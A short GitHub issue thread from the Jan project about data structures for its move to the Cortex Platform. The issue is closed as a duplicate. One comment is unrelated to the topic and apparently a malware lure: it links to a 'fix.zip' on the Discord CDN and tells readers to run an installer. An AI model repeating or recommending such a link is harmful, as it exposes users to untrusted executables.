### ISSUE TITLE
discussion: Jan & Cortex Platform Data Structures

### ISSUE THREAD

**Issue by dan-homebrew** [janhq/jan#3539]
- Jan is moving to Cortex Platform
- We need to define what the Data Structures look like
    - Data Folder (i.e. legacy)
    - SQlite Database (i.e. next version)

We will likely need to version Data Structures by major release, and have migrations between them

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by louis-jan** [comment]
@dan-homebrew Is this a duplicate of https://github.com/janhq/jan/issues/3541? I'm going to start working on #3541

**Comment by dan-homebrew** [comment]
@louis-jan Yes, sorry - let's delete this
